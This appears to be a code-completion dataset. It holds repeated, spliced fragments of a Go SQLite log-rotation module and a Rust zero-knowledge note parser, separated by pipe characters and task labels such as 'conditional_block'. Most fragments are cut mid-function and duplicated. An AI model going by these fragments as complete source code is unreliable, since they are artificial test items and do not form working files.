var log_schema = `
CREATE TABLE if not exists log(
seq INTEGER PRIMARY KEY ASC,
time text,
message text
);
`
// database ORM types
type (
message struct {
Msg string `json:"message"`
}
actor struct {
Uuid string `db:"uuid"`
Name string `db:"name"`
Stime string `db:"start_time"`
Etime string `db:"end_time"`
}
log struct {
Seq int `db:"seq"`
Time string `db:"time"`
Msg []byte `db:"message"`
}
)
// NewSqlite returns an initialized Sqlite instance
//
// ctx: context.Context
//
// name: actor name
//
// uuid: actor uuid
//
// jmode: journal mode
//
// cmode: cache mode
//
// rcnt: 0: no rotation, >0: preserve number of records then rotate.
func NewSqlite(
ctx context.Context, // caller's context
name string, // actor name
uuid string, // actor uuid
jmode int, // journal mode
cmode int, // cache mode
rcnt int, // rotate count
period int, // recycle period in seconds
) (*Sqlite, error) {
db, err := initDB(ctx, name, uuid, jmode, cmode, backupDB)
if err != nil {
l.Logger.Error(
"backup initDB error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
return nil, err
}
if rcnt > 0 {
go rotate(ctx, name, uuid, db, rcnt, period)
}
return &Sqlite{
ctx: ctx,
name: name,
uuid: uuid,
journal: jmode,
cache: cmode,
rotate: rcnt,
db: db,
}, nil
}
func initDB(
ctx context.Context,
name, uuid string,
jmode, cmode int,
dbType int) (*sqlx.DB, error) {
var dbPath string
currentDir, _ := os.Getwd()
switch dbType {
case backupDB:
dbPath = path.Join(currentDir, backupDir)
case rotateDB:
dbPath = path.Join(currentDir, rotateDir)
default:
dbPath = path.Join(currentDir, backupDir)
}
if fi, err := os.Stat(dbPath); err != nil {
if err := os.Mkdir(dbPath, 0700); err != nil {
return nil, err
}
} else if !fi.IsDir() {
// dbPath is a file, not directory
return nil, fmt.Errorf(ErrDbPathIsAFile, dbPath)
}
var dbFile string
gpattern := `%s_%s_*.db`
rpattern := `%s_%s_(?P<SEQ>\d+).db`
switch dbType {
case backupDB:
dbFile = path.Join(dbPath, fmt.Sprintf("%s_%s.db", name, uuid))
case rotateDB:
dbFiles := path.Join(dbPath, fmt.Sprintf(gpattern, name, uuid))
if m, err := filepath.Glob(dbFiles); err != nil {
dbFile = path.Join(dbPath, fmt.Sprintf("%s_%s_1.db", name, uuid))
} else {
re, err := regexp.Compile(fmt.Sprintf(rpattern, name, uuid))
if err != nil {
return nil, err
}
maxCnt := 0
for idx := range m {
match := re.FindStringSubmatch(m[idx])
for i, name := range re.SubexpNames() {
if i != 0 && name == "SEQ" {
v, _ := strconv.Atoi(match[i])
maxCnt = max(v, maxCnt)
}
}
}
dbFile = path.Join(
dbPath, fmt.Sprintf("%s_%s_%d.db", name, uuid, maxCnt+1))
}
default:
dbFile = path.Join(dbPath, fmt.Sprintf("%s_%s.db", name, uuid))
}
dsn := fmt.Sprintf(dbDSN, dbFile, cacheMode[cmode], journalMode[jmode])
// Use open instead of MustOpen, which panics if can't open
// Use open instead of Connect since sqlite is local file
db, err := sqlx.Open(
"sqlite3",
dsn,
)
if err != nil {
return nil, err
}
// The connection is returned to the pool before every call's result
// is returned.
db.SetMaxOpenConns(1)
db.SetMaxIdleConns(1)
	// sqlite Exec can't handle multiple statements, so each schema is executed as a separate statement
db.MustExecContext(ctx, actor_schema)
db.MustExecContext(ctx, log_schema)
return db, nil
}
func max(x, y int) int {
if x < y {
return y
}
return x
}
func rotate(
ctx context.Context,
name, uuid string,
db *sqlx.DB,
rcnt, period int) {
c := time.Tick(time.Duration(period) * time.Second)
if c == nil
|
rating := make(chan struct{}, 1)
selectSql := `SELECT seq, time, message FROM log ORDER BY seq LIMIT ? ;`
deleteSql := `DELETE FROM log WHERE seq <= ? ;`
selectCnt := `SELECT COUNT(*) FROM log ;`
runner := func() {
defer func() {
<-rating
}()
var rowCnt int
tx, err := db.BeginTxx(ctx, nil)
if err != nil {
l.Logger.Error(
"backup db transaction error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
return
}
cntRow := tx.QueryRowxContext(ctx, selectCnt)
cntRow.Scan(&rowCnt)
if rowCnt > rcnt {
rdb, err := initDB(ctx, name, uuid, DELETE, PRIVATE, rotateDB)
if err != nil {
l.Logger.Error(
"rotate initDB error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
defer rdb.Close()
rows, err := tx.QueryxContext(ctx, selectSql, rcnt)
if err != nil {
l.Logger.Error(
"backup db query error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.Int("row count", rcnt),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
defer rows.Close()
lastSeq := 0
for rows.Next() {
var ll log
if err := rows.StructScan(&ll); err != nil {
l.Logger.Error(
"backup db StructScan error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
_, err := rdb.NamedExecContext(
ctx,
insertLog,
ll,
)
if err != nil {
l.Logger.Error(
"rotate db insert error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
lastSeq = ll.Seq
}
// Delete rotated data from backup DB
_, err = tx.ExecContext(
ctx,
deleteSql,
lastSeq,
)
if err != nil {
l.Logger.Error(
"backup db delete error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
}
if err := tx.Commit(); err != nil {
l.Logger.Error(
"backup db commit error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
return
|
{
l.Logger.Error(
"rotate error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", fmt.Sprintf(
"rotate period is invalid: %d", period)),
)
return
}
|
conditional_block
|
sqlite.go
|
message) ;`
)
var (
ErrDbPathIsAFile = "%s is an existing file"
ErrDbClosed = errors.New("DB is closed")
)
var actor_schema = `
CREATE TABLE if not exists actor(
uuid text PRIMARY KEY,
name text,
start_time text,
end_time text
);
`
var log_schema = `
CREATE TABLE if not exists log(
seq INTEGER PRIMARY KEY ASC,
time text,
message text
);
`
// database ORM types
type (
message struct {
Msg string `json:"message"`
}
actor struct {
Uuid string `db:"uuid"`
Name string `db:"name"`
Stime string `db:"start_time"`
Etime string `db:"end_time"`
}
log struct {
Seq int `db:"seq"`
Time string `db:"time"`
Msg []byte `db:"message"`
}
)
// NewSqlite returns an initialized Sqlite instance
//
// ctx: context.Context
//
// name: actor name
//
// uuid: actor uuid
//
// jmode: journal mode
//
// cmode: cache mode
//
// rcnt: 0: no rotation, >0: preserve number of records then rotate.
func NewSqlite(
ctx context.Context, // caller's context
name string, // actor name
uuid string, // actor uuid
jmode int, // journal mode
cmode int, // cache mode
rcnt int, // rotate count
period int, // recycle period in seconds
) (*Sqlite, error) {
db, err := initDB(ctx, name, uuid, jmode, cmode, backupDB)
if err != nil {
l.Logger.Error(
"backup initDB error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
return nil, err
}
if rcnt > 0 {
go rotate(ctx, name, uuid, db, rcnt, period)
}
return &Sqlite{
ctx: ctx,
name: name,
uuid: uuid,
journal: jmode,
cache: cmode,
rotate: rcnt,
db: db,
}, nil
}
func initDB(
ctx context.Context,
name, uuid string,
jmode, cmode int,
dbType int) (*sqlx.DB, error)
|
return nil, fmt.Errorf(ErrDbPathIsAFile, dbPath)
}
var dbFile string
gpattern := `%s_%s_*.db`
rpattern := `%s_%s_(?P<SEQ>\d+).db`
switch dbType {
case backupDB:
dbFile = path.Join(dbPath, fmt.Sprintf("%s_%s.db", name, uuid))
case rotateDB:
dbFiles := path.Join(dbPath, fmt.Sprintf(gpattern, name, uuid))
if m, err := filepath.Glob(dbFiles); err != nil {
dbFile = path.Join(dbPath, fmt.Sprintf("%s_%s_1.db", name, uuid))
} else {
re, err := regexp.Compile(fmt.Sprintf(rpattern, name, uuid))
if err != nil {
return nil, err
}
maxCnt := 0
for idx := range m {
match := re.FindStringSubmatch(m[idx])
for i, name := range re.SubexpNames() {
if i != 0 && name == "SEQ" {
v, _ := strconv.Atoi(match[i])
maxCnt = max(v, maxCnt)
}
}
}
dbFile = path.Join(
dbPath, fmt.Sprintf("%s_%s_%d.db", name, uuid, maxCnt+1))
}
default:
dbFile = path.Join(dbPath, fmt.Sprintf("%s_%s.db", name, uuid))
}
dsn := fmt.Sprintf(dbDSN, dbFile, cacheMode[cmode], journalMode[jmode])
// Use open instead of MustOpen, which panics if can't open
// Use open instead of Connect since sqlite is local file
db, err := sqlx.Open(
"sqlite3",
dsn,
)
if err != nil {
return nil, err
}
// The connection is returned to the pool before every call's result
// is returned.
db.SetMaxOpenConns(1)
db.SetMaxIdleConns(1)
	// sqlite Exec can't handle multiple statements, so each schema is executed as a separate statement
db.MustExecContext(ctx, actor_schema)
db.MustExecContext(ctx, log_schema)
return db, nil
}
func max(x, y int) int {
if x < y {
return y
}
return x
}
func rotate(
ctx context.Context,
name, uuid string,
db *sqlx.DB,
rcnt, period int) {
c := time.Tick(time.Duration(period) * time.Second)
if c == nil {
l.Logger.Error(
"rotate error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", fmt.Sprintf(
"rotate period is invalid: %d", period)),
)
return
}
rating := make(chan struct{}, 1)
selectSql := `SELECT seq, time, message FROM log ORDER BY seq LIMIT ? ;`
deleteSql := `DELETE FROM log WHERE seq <= ? ;`
selectCnt := `SELECT COUNT(*) FROM log ;`
runner := func() {
defer func() {
<-rating
}()
var rowCnt int
tx, err := db.BeginTxx(ctx, nil)
if err != nil {
l.Logger.Error(
"backup db transaction error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
return
}
cntRow := tx.QueryRowxContext(ctx, selectCnt)
cntRow.Scan(&rowCnt)
if rowCnt > rcnt {
rdb, err := initDB(ctx, name, uuid, DELETE, PRIVATE, rotateDB)
if err != nil {
l.Logger.Error(
"rotate initDB error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
defer rdb.Close()
rows, err := tx.QueryxContext(ctx, selectSql, rcnt)
if err != nil {
l.Logger.Error(
"backup db query error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.Int("row count", rcnt),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
defer rows.Close()
lastSeq := 0
for rows.Next() {
var ll log
if err := rows.StructScan(&ll); err != nil {
l.Logger.Error(
"backup db StructScan error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
_, err := rdb.NamedExecContext(
ctx,
insertLog,
ll,
)
if err != nil {
l.Logger.Error(
"rotate db insert error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
lastSeq = ll.Seq
}
// Delete rotated data from backup DB
_, err = tx.ExecContext(
ctx,
deleteSql,
lastSeq,
)
if err != nil {
l.Logger.Error(
"backup db delete error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
}
if err := tx.Commit(); err != nil {
l.Logger.Error(
"backup db commit error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
return
|
{
var dbPath string
currentDir, _ := os.Getwd()
switch dbType {
case backupDB:
dbPath = path.Join(currentDir, backupDir)
case rotateDB:
dbPath = path.Join(currentDir, rotateDir)
default:
dbPath = path.Join(currentDir, backupDir)
}
if fi, err := os.Stat(dbPath); err != nil {
if err := os.Mkdir(dbPath, 0700); err != nil {
return nil, err
}
} else if !fi.IsDir() {
// dbPath is a file, not a directory
|
identifier_body
|
sqlite.go
|
seq INTEGER PRIMARY KEY ASC,
time text,
message text
);
`
// database ORM types
type (
message struct {
Msg string `json:"message"`
}
actor struct {
Uuid string `db:"uuid"`
Name string `db:"name"`
Stime string `db:"start_time"`
Etime string `db:"end_time"`
}
log struct {
Seq int `db:"seq"`
Time string `db:"time"`
Msg []byte `db:"message"`
}
)
// NewSqlite returns an initialized Sqlite instance
//
// ctx: context.Context
//
// name: actor name
//
// uuid: actor uuid
//
// jmode: journal mode
//
// cmode: cache mode
//
// rcnt: 0 disables rotation; >0 rotates once more than rcnt records have accumulated.
func NewSqlite(
ctx context.Context, // caller's context
name string, // actor name
uuid string, // actor uuid
jmode int, // journal mode
cmode int, // cache mode
rcnt int, // rotate count
period int, // recycle period in seconds
) (*Sqlite, error) {
db, err := initDB(ctx, name, uuid, jmode, cmode, backupDB)
if err != nil {
l.Logger.Error(
"backup initDB error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
return nil, err
}
if rcnt > 0 {
go rotate(ctx, name, uuid, db, rcnt, period)
}
return &Sqlite{
ctx: ctx,
name: name,
uuid: uuid,
journal: jmode,
cache: cmode,
rotate: rcnt,
db: db,
}, nil
}
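// Usage sketch (added for illustration, not part of the original file): DELETE and
// PRIVATE are the journal/cache mode constants this package already uses for the
// rotate DB; the rotate count and period values below are arbitrary examples.
func exampleNewSqlite(ctx context.Context) error {
	s, err := NewSqlite(ctx, "worker", "uuid-1234", DELETE, PRIVATE, 1000, 60)
	if err != nil {
		return err
	}
	defer s.Close()
	return nil
}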
func initDB(
ctx context.Context,
name, uuid string,
jmode, cmode int,
dbType int) (*sqlx.DB, error) {
var dbPath string
currentDir, _ := os.Getwd()
switch dbType {
case backupDB:
dbPath = path.Join(currentDir, backupDir)
case rotateDB:
dbPath = path.Join(currentDir, rotateDir)
default:
dbPath = path.Join(currentDir, backupDir)
}
if fi, err := os.Stat(dbPath); err != nil {
if err := os.Mkdir(dbPath, 0700); err != nil {
return nil, err
}
} else if !fi.IsDir() {
// dbPath is a file, not a directory
return nil, fmt.Errorf(ErrDbPathIsAFile, dbPath)
}
var dbFile string
gpattern := `%s_%s_*.db`
rpattern := `%s_%s_(?P<SEQ>\d+).db`
switch dbType {
case backupDB:
dbFile = path.Join(dbPath, fmt.Sprintf("%s_%s.db", name, uuid))
case rotateDB:
dbFiles := path.Join(dbPath, fmt.Sprintf(gpattern, name, uuid))
if m, err := filepath.Glob(dbFiles); err != nil {
dbFile = path.Join(dbPath, fmt.Sprintf("%s_%s_1.db", name, uuid))
} else {
re, err := regexp.Compile(fmt.Sprintf(rpattern, name, uuid))
if err != nil {
return nil, err
}
maxCnt := 0
for idx := range m {
match := re.FindStringSubmatch(m[idx])
for i, name := range re.SubexpNames() {
if i != 0 && name == "SEQ" {
v, _ := strconv.Atoi(match[i])
maxCnt = max(v, maxCnt)
}
}
}
dbFile = path.Join(
dbPath, fmt.Sprintf("%s_%s_%d.db", name, uuid, maxCnt+1))
}
default:
dbFile = path.Join(dbPath, fmt.Sprintf("%s_%s.db", name, uuid))
}
dsn := fmt.Sprintf(dbDSN, dbFile, cacheMode[cmode], journalMode[jmode])
// Use Open instead of MustOpen, which panics if the database can't be opened.
// Use Open instead of Connect since sqlite is just a local file.
db, err := sqlx.Open(
"sqlite3",
dsn,
)
if err != nil {
return nil, err
}
// The connection is returned to the pool before every call's result
// is returned.
db.SetMaxOpenConns(1)
db.SetMaxIdleConns(1)
// sqlite Exec can't handle multi-statement SQL, so each schema statement is executed separately.
db.MustExecContext(ctx, actor_schema)
db.MustExecContext(ctx, log_schema)
return db, nil
}
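// Sketch (added for illustration; the file names are hypothetical): how the SEQ
// capture group above picks the next rotate-file index. With worker_abcd_1.db and
// worker_abcd_2.db already present, the next file would be worker_abcd_3.db.
func nextRotateIndexExample() int {
	re := regexp.MustCompile(`worker_abcd_(?P<SEQ>\d+).db`)
	maxCnt := 0
	for _, f := range []string{"worker_abcd_1.db", "worker_abcd_2.db"} {
		if m := re.FindStringSubmatch(f); m != nil {
			v, _ := strconv.Atoi(m[1])
			maxCnt = max(v, maxCnt)
		}
	}
	return maxCnt + 1 // 3
}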
func max(x, y int) int {
if x < y {
return y
}
return x
}
func rotate(
ctx context.Context,
name, uuid string,
db *sqlx.DB,
rcnt, period int) {
c := time.Tick(time.Duration(period) * time.Second)
if c == nil {
l.Logger.Error(
"rotate error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", fmt.Sprintf(
"rotate period is invalid: %d", period)),
)
return
}
rating := make(chan struct{}, 1)
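// (added note) rating acts as a one-slot semaphore: the non-blocking send in the
// tick loop below skips a rotation pass if the previous runner has not finished.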
selectSql := `SELECT seq, time, message FROM log ORDER BY seq LIMIT ? ;`
deleteSql := `DELETE FROM log WHERE seq <= ? ;`
selectCnt := `SELECT COUNT(*) FROM log ;`
runner := func() {
defer func() {
<-rating
}()
var rowCnt int
tx, err := db.BeginTxx(ctx, nil)
if err != nil {
l.Logger.Error(
"backup db transaction error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
return
}
cntRow := tx.QueryRowxContext(ctx, selectCnt)
cntRow.Scan(&rowCnt)
if rowCnt > rcnt {
rdb, err := initDB(ctx, name, uuid, DELETE, PRIVATE, rotateDB)
if err != nil {
l.Logger.Error(
"rotate initDB error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
defer rdb.Close()
rows, err := tx.QueryxContext(ctx, selectSql, rcnt)
if err != nil {
l.Logger.Error(
"backup db query error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.Int("row count", rcnt),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
defer rows.Close()
lastSeq := 0
for rows.Next() {
var ll log
if err := rows.StructScan(&ll); err != nil {
l.Logger.Error(
"backup db StructScan error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
_, err := rdb.NamedExecContext(
ctx,
insertLog,
ll,
)
if err != nil {
l.Logger.Error(
"rotate db insert error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
lastSeq = ll.Seq
}
// Delete rotated data from backup DB
_, err = tx.ExecContext(
ctx,
deleteSql,
lastSeq,
)
if err != nil {
l.Logger.Error(
"backup db delete error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
}
if err := tx.Commit(); err != nil {
l.Logger.Error(
"backup db commit error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
return
}
}
for {
select {
case <-ctx.Done():
return
case <-c:
select {
case rating <- struct{}{}:
runner()
default:
}
}
}
}
func (s *Sqlite) Close() {
if s.db != nil {
s.db.Close()
}
}
func (s *Sqlite)
|
Insert
|
identifier_name
|
|
lib.rs
|
{
#[wasm_bindgen(skip)]
pub prefix: String,
pub version: NoteVersion,
#[wasm_bindgen(skip)]
pub token_symbol: String,
pub group_id: u32,
pub block_number: Option<u32>,
#[wasm_bindgen(skip)]
pub r: Scalar,
#[wasm_bindgen(skip)]
pub nullifier: Scalar,
}
#[wasm_bindgen]
pub struct ZkProof {
#[wasm_bindgen(skip)]
pub comms: Vec<CompressedRistretto>,
#[wasm_bindgen(skip)]
pub nullifier_hash: Scalar,
#[wasm_bindgen(skip)]
pub proof: Vec<u8>,
#[wasm_bindgen(skip)]
pub leaf_index_comms: Vec<CompressedRistretto>,
#[wasm_bindgen(skip)]
pub proof_comms: Vec<CompressedRistretto>,
}
impl fmt::Display for NoteVersion {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
match self {
NoteVersion::V1 => write!(f, "v1"),
}
}
}
impl FromStr for NoteVersion {
type Err = OpStatusCode;
fn from_str(s: &str) -> Result<Self, Self::Err> {
match s {
"v1" => Ok(NoteVersion::V1),
_ => Err(OpStatusCode::InvalidNoteVersion),
}
}
}
impl fmt::Display for Note {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
let encoded_r = hex::encode(&self.r.to_bytes());
let encoded_nullifier = hex::encode(&self.nullifier.to_bytes());
let mut parts = vec![
self.prefix.clone(),
self.version.to_string(),
self.token_symbol.clone(),
format!("{}", self.group_id),
];
if let Some(bn) = self.block_number {
parts.push(format!("{}", bn));
}
parts.push(format!("{}{}", encoded_r, encoded_nullifier));
let note = parts.join("-");
write!(f, "{}", note)
}
}
impl FromStr for Note {
type Err = OpStatusCode;
fn from_str(s: &str) -> Result<Self, Self::Err> {
let parts: Vec<&str> = s.split('-').collect();
let partial = parts.len() == 5;
let full = parts.len() == 6;
if !partial && !full {
return Err(OpStatusCode::InvalidNoteLength);
}
if parts[0] != NOTE_PREFIX {
return Err(OpStatusCode::InvalidNotePrefix);
}
let version: NoteVersion = parts[1].parse()?;
let token_symbol = parts[2].to_owned();
let group_id = parts[3].parse().map_err(|_| OpStatusCode::InvalidNoteId)?;
let (block_number, note_val) = match partial {
true => (None, parts[4]),
false =>
|
};
if note_val.len() != 128 {
return Err(OpStatusCode::InvalidNoteSecrets);
}
let r = hex::decode(&note_val[..64])
.map(|v| v.try_into())
.map(|r| r.map(Scalar::from_bytes_mod_order))
.map_err(|_| OpStatusCode::InvalidHexLength)?
.map_err(|_| OpStatusCode::HexParsingFailed)?;
let nullifier = hex::decode(&note_val[64..])
.map(|v| v.try_into())
.map(|r| r.map(Scalar::from_bytes_mod_order))
.map_err(|_| OpStatusCode::InvalidHexLength)?
.map_err(|_| OpStatusCode::HexParsingFailed)?;
Ok(Note {
prefix: NOTE_PREFIX.to_owned(),
version,
token_symbol,
group_id,
block_number,
r,
nullifier,
})
}
}
#[wasm_bindgen]
impl Note {
pub fn deserialize(value: JsString) -> Result<Note, JsValue> {
let note: String = value.into();
note.parse().map_err(Into::into)
}
pub fn serialize(&self) -> JsString {
let note = self.to_string();
note.into()
}
#[wasm_bindgen(getter)]
pub fn token_symbol(&self) -> JsString {
self.token_symbol.clone().into()
}
}
#[wasm_bindgen]
impl ZkProof {
#[wasm_bindgen(getter)]
pub fn proof(&self) -> Uint8Array {
Uint8Array::from(self.proof.as_slice())
}
#[wasm_bindgen(getter)]
pub fn comms(&self) -> Commitments {
let list: Array = self
.comms
.clone()
.into_iter()
.map(|v| Uint8Array::from(v.as_bytes().to_vec().as_slice()))
.collect();
let js = JsValue::from(list);
Commitments::from(js)
}
#[wasm_bindgen(getter)]
pub fn leaf_index_comms(&self) -> Commitments {
let list: Array = self
.leaf_index_comms
.clone()
.into_iter()
.map(|v| Uint8Array::from(v.as_bytes().to_vec().as_slice()))
.collect();
let js = JsValue::from(list);
Commitments::from(js)
}
#[wasm_bindgen(getter)]
pub fn proof_comms(&self) -> Commitments {
let list: Array = self
.proof_comms
.clone()
.into_iter()
.map(|v| Uint8Array::from(v.as_bytes().to_vec().as_slice()))
.collect();
let js = JsValue::from(list);
Commitments::from(js)
}
#[wasm_bindgen(getter)]
pub fn nullifier_hash(&self) -> Uint8Array {
ScalarWrapper(self.nullifier_hash).into()
}
}
#[wasm_bindgen]
pub struct PoseidonHasherOptions {
/// The size of the permutation, in field elements.
width: usize,
/// Number of full SBox rounds in beginning
pub full_rounds_beginning: Option<usize>,
/// Number of full SBox rounds in end
pub full_rounds_end: Option<usize>,
/// Number of partial rounds
pub partial_rounds: Option<usize>,
/// The desired (classical) security level, in bits.
pub security_bits: Option<usize>,
/// Bulletproof generators for proving/verifying (serialized)
#[wasm_bindgen(skip)]
pub bp_gens: Option<BulletproofGens>,
}
impl Default for PoseidonHasherOptions {
fn default() -> Self {
Self {
width: 6,
full_rounds_beginning: None,
full_rounds_end: None,
partial_rounds: None,
security_bits: None,
bp_gens: None,
}
}
}
#[wasm_bindgen]
impl PoseidonHasherOptions {
#[wasm_bindgen(constructor)]
pub fn new() -> Self {
Self::default()
}
#[wasm_bindgen(setter)]
pub fn set_bp_gens(&mut self, value: Uint8Array) {
let bp_gens =
bincode::deserialize(&value.to_vec()).unwrap_or_else(|_| BulletproofGens::new(BULLETPROOF_GENS_SIZE, 1));
self.bp_gens = Some(bp_gens);
}
#[wasm_bindgen(getter)]
pub fn bp_gens(&self) -> Uint8Array {
let val = self
.bp_gens
.clone()
.unwrap_or_else(|| BulletproofGens::new(BULLETPROOF_GENS_SIZE, 1));
let serialized = bincode::serialize(&val).unwrap_or_else(|_| Vec::new());
Uint8Array::from(serialized.as_slice())
}
}
#[wasm_bindgen]
#[derive(Clone)]
pub struct PoseidonHasher {
inner: Poseidon,
}
#[wasm_bindgen]
impl PoseidonHasher {
pub fn default() -> Self {
Self::with_options(Default::default())
}
#[wasm_bindgen(constructor)]
pub fn with_options(opts: PoseidonHasherOptions) -> Self {
let pc_gens = PedersenGens::default();
let bp_gens = opts
.bp_gens
.clone()
.unwrap_or_else(|| BulletproofGens::new(BULLETPROOF_GENS_SIZE, 1));
let inner = PoseidonBuilder::new(opts.width)
.sbox(PoseidonSbox::Exponentiation3)
.bulletproof_gens(bp_gens)
.pedersen_gens(pc_gens)
.build();
Self { inner }
}
pub fn hash(&self, left: Uint8Array, right: Uint8Array) -> Result<Uint8Array, JsValue> {
let xl = ScalarWrapper::try_from(left)?;
let xr = ScalarWrapper::try_from(right)?;
let hash = Poseidon_hash_2(*xl, *xr, &self.inner);
Ok(ScalarWrapper(hash).into())
}
}
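// Usage sketch (added for illustration; the inputs are assumptions): hash two
// 32-byte values with the default Poseidon parameters.
//   let hasher = PoseidonHasher::default();
//   let out = hasher.hash(left, right)?; // left/right: js_sys::Uint8Array values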
#[wasm_bind
|
{
let bn = parts[4].parse().map_err(|_| OpStatusCode::InvalidNoteBlockNumber)?;
(Some(bn), parts[5])
}
|
conditional_block
|
lib.rs
|
{
#[wasm_bindgen(skip)]
pub prefix: String,
pub version: NoteVersion,
#[wasm_bindgen(skip)]
pub token_symbol: String,
pub group_id: u32,
pub block_number: Option<u32>,
#[wasm_bindgen(skip)]
pub r: Scalar,
#[wasm_bindgen(skip)]
pub nullifier: Scalar,
}
#[wasm_bindgen]
pub struct ZkProof {
#[wasm_bindgen(skip)]
pub comms: Vec<CompressedRistretto>,
#[wasm_bindgen(skip)]
pub nullifier_hash: Scalar,
#[wasm_bindgen(skip)]
pub proof: Vec<u8>,
#[wasm_bindgen(skip)]
pub leaf_index_comms: Vec<CompressedRistretto>,
#[wasm_bindgen(skip)]
pub proof_comms: Vec<CompressedRistretto>,
}
impl fmt::Display for NoteVersion {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
match self {
NoteVersion::V1 => write!(f, "v1"),
}
}
}
impl FromStr for NoteVersion {
type Err = OpStatusCode;
fn from_str(s: &str) -> Result<Self, Self::Err> {
match s {
"v1" => Ok(NoteVersion::V1),
_ => Err(OpStatusCode::InvalidNoteVersion),
}
}
}
impl fmt::Display for Note {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
let encoded_r = hex::encode(&self.r.to_bytes());
let encoded_nullifier = hex::encode(&self.nullifier.to_bytes());
let mut parts = vec![
self.prefix.clone(),
self.version.to_string(),
self.token_symbol.clone(),
format!("{}", self.group_id),
];
if let Some(bn) = self.block_number {
parts.push(format!("{}", bn));
}
parts.push(format!("{}{}", encoded_r, encoded_nullifier));
let note = parts.join("-");
write!(f, "{}", note)
}
}
impl FromStr for Note {
type Err = OpStatusCode;
fn from_str(s: &str) -> Result<Self, Self::Err> {
let parts: Vec<&str> = s.split('-').collect();
let partial = parts.len() == 5;
let full = parts.len() == 6;
if !partial && !full {
return Err(OpStatusCode::InvalidNoteLength);
}
if parts[0] != NOTE_PREFIX {
return Err(OpStatusCode::InvalidNotePrefix);
}
let version: NoteVersion = parts[1].parse()?;
let token_symbol = parts[2].to_owned();
let group_id = parts[3].parse().map_err(|_| OpStatusCode::InvalidNoteId)?;
let (block_number, note_val) = match partial {
true => (None, parts[4]),
false => {
let bn = parts[4].parse().map_err(|_| OpStatusCode::InvalidNoteBlockNumber)?;
(Some(bn), parts[5])
}
};
if note_val.len() != 128 {
return Err(OpStatusCode::InvalidNoteSecrets);
}
let r = hex::decode(&note_val[..64])
.map(|v| v.try_into())
.map(|r| r.map(Scalar::from_bytes_mod_order))
.map_err(|_| OpStatusCode::InvalidHexLength)?
.map_err(|_| OpStatusCode::HexParsingFailed)?;
let nullifier = hex::decode(&note_val[64..])
.map(|v| v.try_into())
.map(|r| r.map(Scalar::from_bytes_mod_order))
.map_err(|_| OpStatusCode::InvalidHexLength)?
.map_err(|_| OpStatusCode::HexParsingFailed)?;
Ok(Note {
prefix: NOTE_PREFIX.to_owned(),
version,
token_symbol,
group_id,
block_number,
r,
nullifier,
})
}
}
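// Format sketch (added for illustration): a serialized note produced by Display and
// accepted by FromStr looks like
//   <prefix>-v1-<token_symbol>-<group_id>[-<block_number>]-<128 hex chars>
// where the final field is r (first 64 hex chars) followed by the nullifier
// (last 64 hex chars), both reduced with Scalar::from_bytes_mod_order.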
#[wasm_bindgen]
impl Note {
pub fn deserialize(value: JsString) -> Result<Note, JsValue> {
let note: String = value.into();
note.parse().map_err(Into::into)
}
pub fn serialize(&self) -> JsString {
let note = self.to_string();
note.into()
}
#[wasm_bindgen(getter)]
pub fn token_symbol(&self) -> JsString {
self.token_symbol.clone().into()
}
}
#[wasm_bindgen]
impl ZkProof {
